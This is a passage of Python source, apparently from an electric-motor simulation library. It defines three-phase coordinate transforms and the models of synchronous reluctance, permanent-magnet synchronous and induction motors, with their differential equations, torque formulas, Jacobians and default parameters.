_t23 = 2 / 3 * np.array([
[1, -0.5, -0.5],
[0, 0.5 * np.sqrt(3), -0.5 * np.sqrt(3)]
])
# transformation matrix from alpha-beta to abc representation
_t32 = np.array([
[1, 0],
[-0.5, 0.5 * np.sqrt(3)],
[-0.5, -0.5 * np.sqrt(3)]
])
@staticmethod
def t_23(quantities):
"""
Transformation from abc representation to alpha-beta representation
Args:
quantities: The properties in the abc representation like ''[u_a, u_b, u_c]''
Returns:
The converted quantities in the alpha-beta representation like ''[u_alpha, u_beta]''
"""
return np.matmul(ThreePhaseMotor._t23, quantities)
@staticmethod
def t_32(quantities):
"""
Transformation from alpha-beta representation to abc representation
Args:
quantities: The properties in the alpha-beta representation like ``[u_alpha, u_beta]``
Returns:
The converted quantities in the abc representation like ``[u_a, u_b, u_c]``
"""
return np.matmul(ThreePhaseMotor._t32, quantities)
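# Worked example (illustrative): the symmetric three-phase set [1, -0.5, -0.5]
# maps to t_23([1, -0.5, -0.5]) == [1, 0], a pure alpha component, and
# t_32([1, 0]) recovers [1, -0.5, -0.5]; the amplitude-invariant factor 2/3 in
# _t23 makes t_23 a left inverse of t_32.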
@staticmethod
def q(quantities, epsilon):
"""
Transformation of the dq-representation into alpha-beta using the electrical angle
Args:
quantities: Array of two quantities in dq-representation. Example [i_d, i_q]
epsilon: Current electrical angle of the motor
Returns:
Array of the two quantities converted to alpha-beta-representation. Example [u_alpha, u_beta]
"""
cos = math.cos(epsilon)
sin = math.sin(epsilon)
return (cos * quantities[0] - sin * quantities[1],
sin * quantities[0] + cos * quantities[1])
@staticmethod
def q_inv(quantities, epsilon):
"""
Transformation of the alpha-beta-representation into dq using the electrical angle
Args:
quantities: Array of two quantities in alpha-beta-representation. Example [u_alpha, u_beta]
epsilon: Current electrical angle of the motor
Returns:
Array of the two quantities converted to dq-representation. Example [u_d, u_q]
Note:
The transformation from alpha-beta to dq is just its inverse conversion with negated epsilon.
So this method calls q(quantities, -epsilon).
"""
return SynchronousMotor.q(quantities, -epsilon)
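# Worked example (illustrative): q([1, 0], np.pi / 2) == (0, 1), i.e. a pure
# d-component is rotated by 90 electrical degrees onto the beta axis;
# q_inv([0, 1], np.pi / 2) undoes this rotation and returns (1, 0).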
def q_me(self, quantities, epsilon):
"""
Transformation of the dq-representation into alpha-beta using the mechanical angle
Args:
quantities: Array of two quantities in dq-representation. Example [i_d, i_q]
epsilon: Current mechanical angle of the motor
Returns:
Array of the two quantities converted to alpha-beta-representation. Example [u_alpha, u_beta]
"""
return self.q(quantities, epsilon * self._motor_parameter['p'])
def q_inv_me(self, quantities, epsilon):
"""
Transformation of the alpha-beta-representation into dq using the mechanical angle
Args:
quantities: Array of two quantities in alpha-beta-representation. Example [u_alpha, u_beta]
epsilon: Current mechanical angle of the motor
Returns:
Array of the two quantities converted to dq-representation. Example [u_d, u_q]
Note:
The transformation from alpha-beta to dq is just its inverse conversion with negated epsilon.
So this method calls q(quantities, -epsilon).
"""
return self.q_me(quantities, -epsilon)
def _torque_limit(self):
"""
Returns:
Maximal possible torque for the given limits in self._limits
"""
raise NotImplementedError()
def _update_limits(self, limits_d=None, nominal_d=None):
# Docstring of superclass
limits_d = limits_d if limits_d is not None else {}
nominal_d = nominal_d if nominal_d is not None else {}
super()._update_limits(limits_d, nominal_d)
super()._update_limits(dict(torque=self._torque_limit()))
def _update_initial_limits(self, nominal_new={}, **kwargs):
# Docstring of superclass
super()._update_initial_limits(self._nominal_values)
super()._update_initial_limits(nominal_new)
class SynchronousMotor(ThreePhaseMotor):
"""
The SynchronousMotor and its subclasses implement the technical system of a three phase synchronous motor.
This includes the system equations, the motor parameters of the equivalent circuit diagram,
as well as limits and bandwidth.
===================== ========== ============= ===========================================
Motor Parameter Unit Default Value Description
===================== ========== ============= ===========================================
r_s Ohm 0.78 Stator resistance
l_d H 1.2 Direct axis inductance
l_q H 6.3e-3 Quadrature axis inductance
psi_p Wb 0.0094 Effective excitation flux (PMSM only)
p 1 2 Pole pair number
j_rotor kg/m^2 0.017 Moment of inertia of the rotor
===================== ========== ============= ===========================================
=============== ====== =============================================
Motor Currents Unit Description
=============== ====== =============================================
i_sd A Direct axis current
i_sq A Quadrature axis current
i_a A Current through branch a
i_b A Current through branch b
i_c A Current through branch c
i_alpha A Current in alpha axis
i_beta A Current in beta axis
=============== ====== =============================================
=============== ====== =============================================
Motor Voltages Unit Description
=============== ====== =============================================
u_sd           V      Direct axis voltage
u_sq           V      Quadrature axis voltage
u_a            V      Voltage through branch a
u_b            V      Voltage through branch b
u_c            V      Voltage through branch c
u_alpha        V      Voltage in alpha axis
u_beta         V      Voltage in beta axis
=============== ====== =============================================
======== ===========================================================
Limits / Nominal Value Dictionary Entries:
-------- -----------------------------------------------------------
Entry Description
======== ===========================================================
i General current limit / nominal value
i_a Current in phase a
i_b Current in phase b
i_c Current in phase c
i_alpha Current in alpha axis
i_beta Current in beta axis
i_sd Current in direct axis
i_sq Current in quadrature axis
omega Mechanical angular Velocity
epsilon Electrical rotational angle
torque Motor generated torque
u_a Voltage in phase a
u_b Voltage in phase b
u_c Voltage in phase c
u_alpha Voltage in alpha axis
u_beta Voltage in beta axis
u_sd Voltage in direct axis
u_sq Voltage in quadrature axis
======== ===========================================================
Note:
The voltage limits should be the amplitude of the phase voltage (:math:`\hat{u}_S`).
Typically the rms value for the line voltage (:math:`U_L`) is given.
:math:`\hat{u}_S=\sqrt{2/3}~U_L`
The current limits should be the amplitude of the phase current (:math:`\hat{i}_S`).
Typically the rms value for the phase current (:math:`I_S`) is given.
:math:`\hat{i}_S = \sqrt{2}~I_S`
If not specified, nominal values are equal to their corresponding limit values.
Furthermore, if specific limits/nominal values (e.g. i_a) are not specified they are inferred from
the general limits/nominal values (e.g. i)
"""
I_SD_IDX = 0
I_SQ_IDX = 1
EPSILON_IDX = 2
CURRENTS_IDX = [0, 1]
CURRENTS = ['i_sd', 'i_sq']
VOLTAGES = ['u_sd', 'u_sq']
_model_constants = None
_initializer = None
def __init__(self, motor_parameter=None, nominal_values=None,
limit_values=None, motor_initializer=None, **kwargs):
# Docstring of superclass
nominal_values = nominal_values or {}
limit_values = limit_values or {}
super().__init__(motor_parameter, nominal_values,
limit_values, motor_initializer)
self._update_model()
self._update_limits()
@property
def motor_parameter(self):
# Docstring of superclass
return self._motor_parameter
@property
def initializer(self):
# Docstring of superclass
return self._initializer
def reset(self, state_space,
state_positions,
**__):
# Docstring of superclass
if self._initializer and self._initializer['states']:
self.initialize(state_space, state_positions)
return np.asarray(list(self._initial_states.values()))
else:
return np.zeros(len(self.CURRENTS) + 1)
def torque(self, state):
# Docstring of superclass
raise NotImplementedError
def _update_model(self):
"""
Set motor parameters into a matrix for faster computation
"""
raise NotImplementedError
def electrical_ode(self, state, u_dq, omega, *_):
"""
The differential equation of the Synchronous Motor.
Args:
state: The current state of the motor. [i_sd, i_sq, epsilon]
u_dq: The input voltages [u_sd, u_sq]
omega: The mechanical angular velocity of the motor
Returns:
The derivatives of the state vector d/dt([i_sd, i_sq, epsilon])
"""
return np.matmul(self._model_constants, np.array([
omega,
state[self.I_SD_IDX],
state[self.I_SQ_IDX],
u_dq[0],
u_dq[1],
omega * state[self.I_SD_IDX],
omega * state[self.I_SQ_IDX],
]))
def i_in(self, state):
# Docstring of superclass
return state[self.CURRENTS_IDX]
def _update_limits(self):
# Docstring of superclass
voltage_limit = 0.5 * self._limits['u']
voltage_nominal = 0.5 * self._nominal_values['u']
limits_agenda = {}
nominal_agenda = {}
for u, i in zip(self.IO_VOLTAGES, self.IO_CURRENTS):
limits_agenda[u] = voltage_limit
nominal_agenda[u] = voltage_nominal
limits_agenda[i] = self._limits.get('i', None) or \
self._limits[u] / self._motor_parameter['r_s']
nominal_agenda[i] = self._nominal_values.get('i', None) or \
self._nominal_values[u] / \
self._motor_parameter['r_s']
super()._update_limits(limits_agenda, nominal_agenda)
class SynchronousReluctanceMotor(SynchronousMotor):
"""
===================== ========== ============= ===========================================
Motor Parameter Unit Default Value Description
===================== ========== ============= ===========================================
r_s Ohm 0.78 Stator resistance
l_d H 1.2 Direct axis inductance
l_q H 6.3e-3 Quadrature axis inductance
p 1 2 Pole pair number
j_rotor kg/m^2 0.017 Moment of inertia of the rotor
===================== ========== ============= ===========================================
=============== ====== =============================================
Motor Currents Unit Description
=============== ====== =============================================
i_sd A Direct axis current
i_sq A Quadrature axis current
i_a A Current through branch a
i_b A Current through branch b
i_c A Current through branch c
i_alpha A Current in alpha axis
i_beta A Current in beta axis
=============== ====== =============================================
=============== ====== =============================================
Motor Voltages Unit Description
=============== ====== =============================================
u_sd V Direct axis voltage
u_sq V Quadrature axis voltage
u_a V Voltage through branch a
u_b V Voltage through branch b
u_c V Voltage through branch c
u_alpha V Voltage in alpha axis
u_beta V Voltage in beta axis
=============== ====== =============================================
======== ===========================================================
Limits / Nominal Value Dictionary Entries:
-------- -----------------------------------------------------------
Entry Description
======== ===========================================================
i General current limit / nominal value
i_a Current in phase a
i_b Current in phase b
i_c Current in phase c
i_alpha Current in alpha axis
i_beta Current in beta axis
i_sd Current in direct axis
i_sq Current in quadrature axis
omega Mechanical angular Velocity
epsilon Electrical rotational angle
torque Motor generated torque
u_a Voltage in phase a
u_b Voltage in phase b
u_c Voltage in phase c
u_alpha Voltage in alpha axis
u_beta Voltage in beta axis
u_sd Voltage in direct axis
u_sq Voltage in quadrature axis
======== ===========================================================
Note:
The voltage limits should be the amplitude of the phase voltage (:math:`\hat{u}_S`).
Typically the rms value for the line voltage (:math:`U_L`) is given.
:math:`\hat{u}_S=\sqrt{2/3}~U_L`
The current limits should be the amplitude of the phase current (:math:`\hat{i}_S`).
Typically the rms value for the phase current (:math:`I_S`) is given.
:math:`\hat{i}_S = \sqrt{2}~I_S`
If not specified, nominal values are equal to their corresponding limit values.
Furthermore, if specific limits/nominal values (e.g. i_a) are not specified they are inferred from
the general limits/nominal values (e.g. i)
"""
HAS_JACOBIAN = True
#### Parameters taken from DOI: 10.1109/AMC.2008.4516099 (<NAME>, <NAME>, <NAME>)
_default_motor_parameter = {'p': 4,
'l_d': 10.1e-3,
'l_q': 4.1e-3,
'j_rotor': 0.8e-3,
'r_s': 0.57
}
_default_nominal_values = {'i': 10, 'torque': 0, 'omega': 3e3 * np.pi / 30, 'epsilon': np.pi, 'u': 100}
_default_limits = {'i': 13, 'torque': 0, 'omega': 4.3e3 * np.pi / 30, 'epsilon': np.pi, 'u': 100}
_default_initializer = {'states': {'i_sq': 0.0, 'i_sd': 0.0, 'epsilon': 0.0},
'interval': None,
'random_init': None,
'random_params': (None, None)}
IO_VOLTAGES = ['u_a', 'u_b', 'u_c', 'u_sd', 'u_sq']
IO_CURRENTS = ['i_a', 'i_b', 'i_c', 'i_sd', 'i_sq']
def _update_model(self):
# Docstring of superclass
mp = self._motor_parameter
self._model_constants = np.array([
# omega, i_sd, i_sq, u_sd, u_sq, omega * i_sd, omega * i_sq
[ 0, -mp['r_s'], 0, 1, 0, 0, mp['l_q'] * mp['p']],
[ 0, 0, -mp['r_s'], 0, 1, -mp['l_d'] * mp['p'], 0],
[mp['p'], 0, 0, 0, 0, 0, 0]
])
self._model_constants[self.I_SD_IDX] = self._model_constants[self.I_SD_IDX] / mp['l_d']
self._model_constants[self.I_SQ_IDX] = self._model_constants[self.I_SQ_IDX] / mp['l_q']
def _torque_limit(self):
# Docstring of superclass
return self.torque([self._limits['i_sd'] / np.sqrt(2), self._limits['i_sq'] / np.sqrt(2), 0])
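# Illustrative note: the pure reluctance torque below is proportional to
# i_sd * i_sq, which is maximal on the current circle i_sd^2 + i_sq^2 = i^2 at
# i_sd = i_sq = i / sqrt(2); this motivates the division by sqrt(2) above.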
def torque(self, currents):
# Docstring of superclass
mp = self._motor_parameter
return 1.5 * mp['p'] * (mp['l_d'] - mp['l_q']) * currents[self.I_SD_IDX] * currents[self.I_SQ_IDX]
def electrical_jacobian(self, state, u_in, omega, *_):
mp = self._motor_parameter
return (
np.array([
[-mp['r_s'] / mp['l_d'], mp['l_q'] / mp['l_d'] * mp['p'] * omega, 0],
[-mp['l_d'] / mp['l_q'] * mp['p'] * omega, -mp['r_s'] / mp['l_q'], 0],
[0, 0, 0]
]),
np.array([
mp['p'] * mp['l_q'] / mp['l_d'] * state[self.I_SQ_IDX],
- mp['p'] * mp['l_d'] / mp['l_q'] * state[self.I_SD_IDX],
mp['p']
]),
np.array([
1.5 * mp['p'] * (mp['l_d'] - mp['l_q']) * state[self.I_SQ_IDX],
1.5 * mp['p'] * (mp['l_d'] - mp['l_q']) * state[self.I_SD_IDX],
0
])
)
class PermanentMagnetSynchronousMotor(SynchronousMotor):
"""
===================== ========== ============= ===========================================
Motor Parameter Unit Default Value Description
===================== ========== ============= ===========================================
r_s Ohm 0.78 Stator resistance
l_d H 1.2 Direct axis inductance
l_q H 6.3e-3 Quadrature axis inductance
p 1 2 Pole pair number
j_rotor kg/m^2 0.017 Moment of inertia of the rotor
===================== ========== ============= ===========================================
=============== ====== =============================================
Motor Currents Unit Description
=============== ====== =============================================
i_sd A Direct axis current
i_sq A Quadrature axis current
i_a A Current through branch a
i_b A Current through branch b
i_c A Current through branch c
i_alpha A Current in alpha axis
i_beta A Current in beta axis
=============== ====== =============================================
=============== ====== =============================================
Motor Voltages Unit Description
=============== ====== =============================================
u_sd V Direct axis voltage
u_sq V Quadrature axis voltage
u_a V Voltage through branch a
u_b V Voltage through branch b
u_c V Voltage through branch c
u_alpha V Voltage in alpha axis
u_beta V Voltage in beta axis
=============== ====== =============================================
======== ===========================================================
Limits / Nominal Value Dictionary Entries:
-------- -----------------------------------------------------------
Entry Description
======== ===========================================================
i General current limit / nominal value
i_a Current in phase a
i_b Current in phase b
i_c Current in phase c
i_alpha Current in alpha axis
i_beta Current in beta axis
i_sd Current in direct axis
i_sq Current in quadrature axis
omega Mechanical angular Velocity
torque Motor generated torque
epsilon Electrical rotational angle
u_a Voltage in phase a
u_b Voltage in phase b
u_c Voltage in phase c
u_alpha Voltage in alpha axis
u_beta Voltage in beta axis
u_sd Voltage in direct axis
u_sq Voltage in quadrature axis
======== ===========================================================
Note:
The voltage limits should be the amplitude of the phase voltage (:math:`\hat{u}_S`).
Typically the rms value for the line voltage (:math:`U_L`) is given.
:math:`\hat{u}_S=\sqrt{2/3}~U_L`
The current limits should be the amplitude of the phase current (:math:`\hat{i}_S`).
Typically the rms value for the phase current (:math:`I_S`) is given.
:math:`\hat{i}_S = \sqrt{2}~I_S`
If not specified, nominal values are equal to their corresponding limit values.
Furthermore, if specific limits/nominal values (e.g. i_a) are not specified they are inferred from
the general limits/nominal values (e.g. i)
"""
#### Parameters taken from DOI: 10.1109/TPEL.2020.3006779 (<NAME>, <NAME>, <NAME>, <NAME>)
#### and DOI: 10.1109/IEMDC.2019.8785122 (<NAME>, <NAME>, <NAME>)
_default_motor_parameter = {
'p': 3,
'l_d': 0.37e-3,
'l_q': 1.2e-3,
'j_rotor': 0.3883,
'r_s': 18e-3,
'psi_p': 66e-3,
}
HAS_JACOBIAN = True
_default_limits = dict(omega=12e3 * np.pi / 30, torque=0.0, i=260, epsilon=math.pi, u=300)
_default_nominal_values = dict(omega=3e3 * np.pi / 30, torque=0.0, i=240, epsilon=math.pi, u=300)
_default_initializer = {'states': {'i_sq': 0.0, 'i_sd': 0.0, 'epsilon': 0.0},
'interval': None,
'random_init': None,
'random_params': (None, None)}
IO_VOLTAGES = ['u_a', 'u_b', 'u_c', 'u_sd', 'u_sq']
IO_CURRENTS = ['i_a', 'i_b', 'i_c', 'i_sd', 'i_sq']
def _update_model(self):
# Docstring of superclass
mp = self._motor_parameter
self._model_constants = np.array([
# omega, i_d, i_q, u_d, u_q, omega * i_d, omega * i_q
[ 0, -mp['r_s'], 0, 1, 0, 0, mp['l_q'] * mp['p']],
[-mp['psi_p'] * mp['p'], 0, -mp['r_s'], 0, 1, -mp['l_d'] * mp['p'], 0],
[ mp['p'], 0, 0, 0, 0, 0, 0],
])
self._model_constants[self.I_SD_IDX] = self._model_constants[self.I_SD_IDX] / mp['l_d']
self._model_constants[self.I_SQ_IDX] = self._model_constants[self.I_SQ_IDX] / mp['l_q']
def _torque_limit(self):
# Docstring of superclass
mp = self._motor_parameter
if mp['l_d'] == mp['l_q']:
return self.torque([0, self._limits['i_sq'], 0])
else:
i_n = self.nominal_values['i']
_p = mp['psi_p'] / (2 * (mp['l_d'] - mp['l_q']))
_q = - i_n ** 2 / 2
i_d_opt = - _p / 2 - np.sqrt( (_p / 2) ** 2 - _q)
i_q_opt = np.sqrt(i_n ** 2 - i_d_opt ** 2)
return self.torque([i_d_opt, i_q_opt, 0])
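# Illustrative derivation of the MTPA point above: maximizing
# (psi_p + (l_d - l_q) * i_d) * sqrt(i_n ** 2 - i_d ** 2) over i_d leads to the
# quadratic i_d ** 2 + _p * i_d + _q = 0, solved by the pq-formula; the chosen
# root is the torque-maximizing d-current (negative for l_q > l_d, as is
# typical for interior PMSMs).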
def torque(self, currents):
# Docstring of superclass
mp = self._motor_parameter
return 1.5 * mp['p'] * (mp['psi_p'] + (mp['l_d'] - mp['l_q']) * currents[self.I_SD_IDX]) * currents[self.I_SQ_IDX]
def electrical_jacobian(self, state, u_in, omega, *args):
mp = self._motor_parameter
return (
np.array([ # dx'/dx
[-mp['r_s'] / mp['l_d'], mp['l_q']/mp['l_d'] * omega * mp['p'], 0],
[-mp['l_d'] / mp['l_q'] * omega * mp['p'], - mp['r_s'] / mp['l_q'], 0],
[0, 0, 0]
]),
np.array([ # dx'/dw
mp['p'] * mp['l_q'] / mp['l_d'] * state[self.I_SQ_IDX],
- mp['p'] * mp['l_d'] / mp['l_q'] * state[self.I_SD_IDX] - mp['p'] * mp['psi_p'] / mp['l_q'],
mp['p']
]),
np.array([ # dT/dx
1.5 * mp['p'] * (mp['l_d'] - mp['l_q']) * state[self.I_SQ_IDX],
1.5 * mp['p'] * (mp['psi_p'] + (mp['l_d'] - mp['l_q']) * state[self.I_SD_IDX]),
0
])
)
class InductionMotor(ThreePhaseMotor):
"""
The InductionMotor and its subclasses implement the technical system of a three phase induction motor.
This includes the system equations, the motor parameters of the equivalent circuit diagram,
as well as limits and bandwidth.
===================== ========== ============= ===========================================
Motor Parameter Unit Default Value Description
===================== ========== ============= ===========================================
r_s Ohm 2.9338 Stator resistance
r_r Ohm 1.355 Rotor resistance
l_m H 143.75e-3 Main inductance
l_sigs H 5.87e-3 Stator-side stray inductance
l_sigr H 5.87e-3 Rotor-side stray inductance
p 1 2 Pole pair number
j_rotor kg/m^2 0.0011 Moment of inertia of the rotor
===================== ========== ============= ===========================================
=============== ====== =============================================
Motor Currents Unit Description
=============== ====== =============================================
i_sd A Direct axis current
i_sq A Quadrature axis current
i_sa A Current through branch a
i_sb A Current through branch b
i_sc A Current through branch c
i_salpha A Current in alpha axis
i_sbeta A Current in beta axis
=============== ====== =============================================
=============== ====== =============================================
Motor Voltages Unit Description
=============== ====== =============================================
u_sd V Direct axis voltage
u_sq V Quadrature axis voltage
u_sa V Voltage through branch a
u_sb V Voltage through branch b
u_sc V Voltage through branch c
u_salpha V Voltage in alpha axis
u_sbeta V Voltage in beta axis
=============== ====== =============================================
======== ===========================================================
Limits / Nominal Value Dictionary Entries:
-------- -----------------------------------------------------------
Entry Description
======== ===========================================================
i General current limit / nominal value
i_sa Current in phase a
i_sb Current in phase b
i_sc Current in phase c
i_salpha Current in alpha axis
i_sbeta Current in beta axis
i_sd Current in direct axis
i_sq Current in quadrature axis
omega Mechanical angular Velocity
torque Motor generated torque
u_sa Voltage in phase a
u_sb Voltage in phase b
u_sc Voltage in phase c
u_salpha Voltage in alpha axis
u_sbeta Voltage in beta axis
u_sd Voltage in direct axis
u_sq Voltage in quadrature axis
======== ===========================================================
Note:
The voltage limits should be the amplitude of the phase voltage (:math:`\hat{u}_S`).
Typically the rms value for the line voltage (:math:`U_L`) is given.
:math:`\hat{u}_S=\sqrt{2/3}~U_L`
The current limits should be the amplitude of the phase current (:math:`\hat{i}_S`).
Typically the rms value for the phase current (:math:`I_S`) is given.
:math:`\hat{i}_S = \sqrt{2}~I_S`
If not specified, nominal values are equal to their corresponding limit values.
Furthermore, if specific limits/nominal values (e.g. i_a) are not specified they are inferred from
the general limits/nominal values (e.g. i)
"""
I_SALPHA_IDX = 0
I_SBETA_IDX = 1
PSI_RALPHA_IDX = 2
PSI_RBETA_IDX = 3
EPSILON_IDX = 4
CURRENTS_IDX = [0, 1]
FLUX_IDX = [2, 3]
CURRENTS = ['i_salpha', 'i_sbeta']
FLUXES = ['psi_ralpha', 'psi_rbeta']
STATOR_VOLTAGES = ['u_salpha', 'u_sbeta']
IO_VOLTAGES = ['u_sa', 'u_sb', 'u_sc', 'u_salpha', 'u_sbeta', 'u_sd',
'u_sq']
IO_CURRENTS = ['i_sa', 'i_sb', 'i_sc', 'i_salpha', 'i_sbeta', 'i_sd',
'i_sq']
HAS_JACOBIAN = True
#### Parameters taken from DOI: 10.1109/EPEPEMC.2018.8522008 (<NAME>, <NAME>, <NAME>)
_default_motor_parameter = {
'p': 2,
'l_m': 143.75e-3,
'l_sigs': 5.87e-3,
'l_sigr': 5.87e-3,
'j_rotor': 1.1e-3,
'r_s': 2.9338,
'r_r': 1.355,
}
_default_limits = dict(omega=4e3 * np.pi / 30, torque=0.0, i=5.5, epsilon=math.pi, u=560)
_default_nominal_values = dict(omega=3e3 * np.pi / 30, torque=0.0, i=3.9, epsilon=math.pi, u=560)
_model_constants = None
_default_initializer = {'states': {'i_salpha': 0.0, 'i_sbeta': 0.0,
'psi_ralpha': 0.0, 'psi_rbeta': 0.0,
'epsilon': 0.0},
'interval': None,
'random_init': None,
'random_params': (None, None)}
_initializer = None
@property
def motor_parameter(self):
# Docstring of superclass
return self._motor_parameter
@property
def initializer(self):
# Docstring of superclass
return self._initializer
def __init__(self, motor_parameter=None, nominal_values=None,
limit_values=None, motor_initializer=None, initial_limits=None,
**__):
# Docstring of superclass
# convert placeholder i and u to actual IO quantities
_nominal_values = self._default_nominal_values.copy()
_nominal_values.update({u: _nominal_values['u'] for u in self.IO_VOLTAGES})
_nominal_values.update({i: _nominal_values['i'] for i in self.IO_CURRENTS})
del _nominal_values['u'], _nominal_values['i']
_nominal_values.update(nominal_values or {})
# same for limits
_limit_values = self._default_limits.copy()
_limit_values.update({u: _limit_values['u'] for u in self.IO_VOLTAGES})
_limit_values.update({i: _limit_values['i'] for i in self.IO_CURRENTS})
del _limit_values['u'], _limit_values['i']
_limit_values.update(limit_values or {})
super().__init__(motor_parameter, nominal_values,
limit_values, motor_initializer, initial_limits)
self._update_model()
self._update_limits(_limit_values, _nominal_values)
def reset(self,
state_space,
state_positions,
omega=None):
# Docstring of superclass
if self._initializer and self._initializer['states']:
self._update_initial_limits(omega=omega)
self.initialize(state_space, state_positions)
return np.asarray(list(self._initial_states.values()))
else:
return np.zeros(len(self.CURRENTS) + len(self.FLUXES) + 1)
def electrical_ode(self, state, u_sr_alphabeta, omega, *args):
"""
The differential equation of the Induction Motor.
Args:
state: The momentary state of the motor. [i_salpha, i_sbeta, psi_ralpha, psi_rbeta, epsilon]
u_sr_alphabeta: The input voltages [u_salpha, u_sbeta, u_ralpha, u_rbeta]
omega: The mechanical angular velocity of the motor
Returns:
The derivatives of the state vector d/dt( [i_salpha, i_sbeta, psi_ralpha, psi_rbeta, epsilon])
"""
return np.matmul(self._model_constants, np.array([
# omega, i_alpha, i_beta, psi_ralpha, psi_rbeta, omega * psi_ralpha, omega * psi_rbeta, u_salpha, u_sbeta, u_ralpha, u_rbeta,
omega,
state[self.I_SALPHA_IDX],
state[self.I_SBETA_IDX],
state[self.PSI_RALPHA_IDX],
state[self.PSI_RBETA_IDX],
omega * state[self.PSI_RALPHA_IDX],
omega * state[self.PSI_RBETA_IDX],
u_sr_alphabeta[0, 0],
u_sr_alphabeta[0, 1],
u_sr_alphabeta[1, 0],
u_sr_alphabeta[1, 1],
]))
def i_in(self, state):
# Docstring of superclass
return state[self.CURRENTS_IDX]
def _torque_limit(self):
# Docstring of superclass
mp = self._motor_parameter
return 1.5 * mp['p'] * mp['l_m'] ** 2/(mp['l_m']+mp['l_sigr']) * self._limits['i_sd'] * self._limits['i_sq'] / 2
def torque(self, states):
# Docstring of superclass
mp = self._motor_parameter
return 1.5 * mp['p'] * mp['l_m']/(mp['l_m'] + mp['l_sigr']) * (states[self.PSI_RALPHA_IDX] * states[self.I_SBETA_IDX] - states[self.PSI_RBETA_IDX] * states[self.I_SALPHA_IDX])
def _flux_limit(self, omega=0, eps_mag=0, u_q_max=0.0, u_rq_max=0.0):
"""
Calculate flux limits for a given current and magnetic-field angle
Args:
omega(float): speed given by the mechanical load
eps_mag(float): magnetic field angle
u_q_max(float): maximal stator voltage in the q-system
u_rq_max(float): maximal rotor voltage in the q-system
Returns:
maximal flux values(list) in the alpha-beta-system
"""
mp = self.motor_parameter
l_s = mp['l_m'] + mp['l_sigs']
l_r = mp['l_m'] + mp['l_sigr']
l_mr = mp['l_m'] / l_r
sigma = (l_s * l_r - mp['l_m'] ** 2) / (l_s * l_r)
# limiting flux for a low omega
        if omega == 0:
            # i_d is also needed for the clipping below, so define it in this branch as well
            i_d = self._nominal_values['i_sd']
            psi_d_max = mp['l_m'] * i_d
else:
i_d, i_q = self.q_inv([self._initial_states['i_salpha'],
self._initial_states['i_sbeta']],
eps_mag)
psi_d_max = mp['p'] * omega * sigma * l_s * i_d + \
(mp['r_s'] + mp['r_r'] * l_mr**2) * i_q + \
u_q_max + \
l_mr * u_rq_max
psi_d_max /= - mp['p'] * omega * l_mr
# clipping flux and setting nominal limit
psi_d_max = 0.9 * np.clip(psi_d_max, a_min=0, a_max=np.abs(mp['l_m'] * i_d))
# returning flux in alpha, beta system
return self.q([psi_d_max, 0], eps_mag)
def _update_model(self):
# Docstring of superclass
mp = self._motor_parameter
l_s = mp['l_m']+mp['l_sigs']
l_r = mp['l_m']+mp['l_sigr']
sigma = (l_s*l_r-mp['l_m']**2) /(l_s*l_r)
tau_r = l_r / mp['r_r']
tau_sig = sigma * l_s / (
mp['r_s'] + mp['r_r'] * (mp['l_m'] ** 2) / (l_r ** 2))
self._model_constants = np.array([
# omega, i_alpha, i_beta, psi_ralpha, psi_rbeta, omega * psi_ralpha, omega * psi_rbeta, u_salpha, u_sbeta, u_ralpha, u_rbeta,
            [0, -1 / tau_sig, 0, mp['l_m'] * mp['r_r'] / (sigma * l_s * l_r ** 2), 0, 0,
             +mp['l_m'] * mp['p'] / (sigma * l_r * l_s), 1 / (sigma * l_s), 0,
             -mp['l_m'] / (sigma * l_r * l_s), 0, ],  # i_salpha_dot
[0, 0, -1 / tau_sig, 0,
mp['l_m'] * mp['r_r'] / (sigma * l_s * l_r ** 2),
-mp['l_m'] * mp['p'] / (sigma * l_r * l_s), 0, 0,
             1 / (sigma * l_s), 0, -mp['l_m'] / (sigma * l_r * l_s), ],  # i_sbeta_dot
[0, mp['l_m'] / tau_r, 0, -1 / tau_r, 0, 0, -mp['p'], 0, 0, 1,
0, ], # psi_ralpha_dot
[0, 0, mp['l_m'] / tau_r, 0, -1 / tau_r, mp['p'], 0, 0, 0, 0, 1, ],
# psi_rbeta_dot
[mp['p'], 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ], # epsilon_dot
])
def electrical_jacobian(self, state, u_in, omega, *args):
mp = self._motor_parameter
l_s = mp['l_m'] + mp['l_sigs']
l_r = mp['l_m'] + mp['l_sigr']
sigma = (l_s * l_r - mp['l_m'] ** 2) / (l_s * l_r)
tau_r = l_r / mp['r_r']
tau_sig = sigma * l_s / (
mp['r_s'] + mp['r_r'] * (mp['l_m'] ** 2) / (l_r ** 2))
return (
np.array([ # dx'/dx
# i_alpha i_beta psi_alpha psi_beta epsilon
[-1 / tau_sig, 0,
mp['l_m'] * mp['r_r'] / (sigma * l_s * l_r ** 2),
omega * mp['l_m'] * mp['p'] / (sigma * l_r * l_s), 0],
[0, - 1 / tau_sig,
- omega * mp['l_m'] * mp['p'] / (sigma * l_r * l_s),
mp['l_m'] * mp['r_r'] / (sigma * l_s * l_r ** 2), 0],
[mp['l_m'] / tau_r, 0, - 1 / tau_r, - omega * mp['p'], 0],
[0, mp['l_m'] / tau_r, omega * mp['p'], - 1 / tau_r, 0],
[0, 0, 0, 0, 0]
]),
np.array([ # dx'/dw
mp['l_m'] * mp['p'] / (sigma * l_r * l_s) * state[
self.PSI_RBETA_IDX],
- mp['l_m'] * mp['p'] / (sigma * l_r * l_s) * state[
self.PSI_RALPHA_IDX],
- mp['p'] * state[self.PSI_RBETA_IDX],
mp['p'] * state[self.PSI_RALPHA_IDX],
mp['p']
]),
np.array([ # dT/dx
- state[self.PSI_RBETA_IDX] * 3 / 2 * mp['p'] * mp[
'l_m'] / l_r,
state[self.PSI_RALPHA_IDX] * 3 / 2 * mp['p'] * mp['l_m'] / l_r,
state[self.I_SBETA_IDX] * 3 / 2 * mp['p'] * mp['l_m'] / l_r,
- state[self.I_SALPHA_IDX] * 3 / 2 * mp['p'] * mp['l_m'] / l_r,
0
])
)
class SquirrelCageInductionMotor(InductionMotor):
"""
===================== ========== ============= ===========================================
Motor Parameter Unit Default Value Description
===================== ========== ============= ===========================================
r_s Ohm 2.9338 Stator resistance
r_r Ohm 1.355 Rotor resistance
l_m H 143.75e-3 Main inductance
l_sigs H 5.87e-3 Stator-side stray inductance
l_sigr H 5.87e-3 Rotor-side stray inductance
p 1 2 Pole pair number
j_rotor kg/m^2 0.0011 Moment of inertia of the rotor
===================== ========== ============= ===========================================
=============== ====== =============================================
Motor Currents Unit Description
=============== ====== =============================================
i_sd A Direct axis current
i_sq A Quadrature axis current
i_sa A Stator current through branch a
i_sb A Stator current through branch b
